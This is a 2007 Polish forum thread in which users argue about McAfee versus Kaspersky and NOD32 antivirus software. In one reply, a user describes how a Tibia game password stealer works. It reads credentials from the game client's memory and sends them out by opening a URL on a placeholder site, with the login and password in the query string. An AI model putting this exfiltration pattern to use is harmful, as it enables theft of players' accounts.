zaloguj się

Pokaż pełną wersje : McAffe

Diddy
12-01-2007, 22:41
Co sądzicie o tym antivirze ?

Tompior
12-01-2007, 22:42
jest cienki, uzywaj kasperskiego albo noda32

Shein Silvershadow
13-01-2007, 13:49
jest cienki, uzywaj kasperskiego albo noda32

Akurat. W moim wypadku McAfee jeszcze NIC nie przepuścił. Przez kilka lat używania nie miałem ani jednego wirusa.

Tompior
13-01-2007, 14:53
@shein

Jesli twierdzisz ze McAffe jest lepsze od kasperskiego i noda to gratuluje.

(jak sie nie chodzi po dziwnych stronach w necie i nie sciaga sie podejzanych plikow to nawet kiepski antyvir starczy) :P

Shein Silvershadow
13-01-2007, 15:57
@shein

Jesli twierdzisz ze McAffe jest lepsze od kasperskiego i noda to gratuluje.

(jak sie nie chodzi po dziwnych stronach w necie i nie sciaga sie podejzanych plikow to nawet kiepski antyvir starczy) :P
McAfee, nie McAffe.

I nie raz zdarzyło mi się pobrać plik z keyloggerem, czy też wejść na stronę pełną trojanów:P

31337
13-01-2007, 16:54
Każdy antyvir to jedno i to samo ścierwo :p

Akurat. W moim wypadku McAfee jeszcze NIC nie przepuścił. Przez kilka lat używania nie miałem ani jednego wirusa.
Typowe :p

A czy jak by przepuścił, wiedział byś o tym ;)
Haker to nie lama i nie implementuje funkcj cdopen() czy mesagebox()...
Ściągnie co chce i papa, nawet nie będziesz wiedział że z twojego ip DoSuje microsoft, tylko 'kurde, czemu mam takie lagi?? to pewnie wina TEPSY!!'.

I nie raz zdarzyło mi się pobrać plik z keyloggerem, czy też wejść na stronę pełną trojanów
Człowieku, keyloggery to przeżytek. Ty myślisz, że ktoś będzie cały dzień czytał gigabajty logów?
Ściągasz i odpalasz plik, program czyta z pamięci klienta tibii passy, uruchamia shellexecutem "explorer***** http://stronka.com/pass.php?a='twoj_login_to_tibii'&b='twoj_pass_do_tibii'". I już masz po koncie :p

Co do pytania autora, to nie. Szkoda ramu.

Lepiej zainstaluj firewalla. Chociarz jak masz zewnętrzne i zmienne ip, to systemowy ci wystarczy :p.